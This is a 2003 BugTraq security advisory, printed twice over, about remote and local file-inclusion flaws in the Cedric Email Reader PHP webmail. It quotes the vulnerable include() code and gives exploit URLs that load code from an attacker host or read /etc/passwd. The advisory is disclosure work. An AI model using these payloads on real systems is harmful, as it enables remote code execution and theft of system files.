BugTraq
Back to list
|
Post reply
Cedric Email Reader (PHP)
Feb 09 2003 10:05AM
MGhz (magas mail lt)
Version : 0.2;0.3;0.4
Website : http://www.isoca.com/
Problems :Include file (local, remote)
Version: 0.2;0.3
File:
---------------------------------
email.php3 (version 0.2) ; email.php (version 0.3)
---------------------------------
PHP Code:
---------------------------------
[...]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[...]
---------------------------------
Exploit :
---------------------------------
http://[target]/email.php?login=attacker&cer_skin=http://
[attacker]/code.php
-->
include http://[attacker]/code.php on remote server
---
include local file
-->
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd
---------------------------------
Versions: 0.4
File:
---------------------------------
webmail/lib/emailreader_execute_on_each_page.inc.php
---------------------------------
PHP Code:
---------------------------------
[...]
$param = imap_base64($login);
parse_str($param);
@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[...]
---------------------------------
Exploit :
---------------------------------
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=http://[attacker]/code.php
-->
include http://[attacker]/code.php on remote server
---
include local file
-->
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=/etc/passwd
---------------------------------
--
(if registers_global=ON)
--
--
magas (at) mail (dot) lt [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Version : 0.2;0.3;0.4
Website : http://www.isoca.com/
Problems :Include file (local, remote)
Version: 0.2;0.3
File:
---------------------------------
email.php3 (version 0.2) ; email.php (version 0.3)
---------------------------------
PHP Code:
---------------------------------
[...]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[...]
---------------------------------
Exploit :
---------------------------------
http://[target]/email.php?login=attacker&cer_skin=http://
[attacker]/code.php
-->
include http://[attacker]/code.php on remote server
---
include local file
-->
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd
---------------------------------
Versions: 0.4
File:
---------------------------------
webmail/lib/emailreader_execute_on_each_page.inc.php
---------------------------------
PHP Code:
---------------------------------
[...]
$param = imap_base64($login);
parse_str($param);
@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[...]
---------------------------------
Exploit :
---------------------------------
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=http://[attacker]/code.php
-->
include http://[attacker]/code.php on remote server
---
include local file
-->
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=/etc/passwd
---------------------------------
--
(if registers_global=ON)
--
--
magas (at) mail (dot) lt [email concealed]
[ reply ]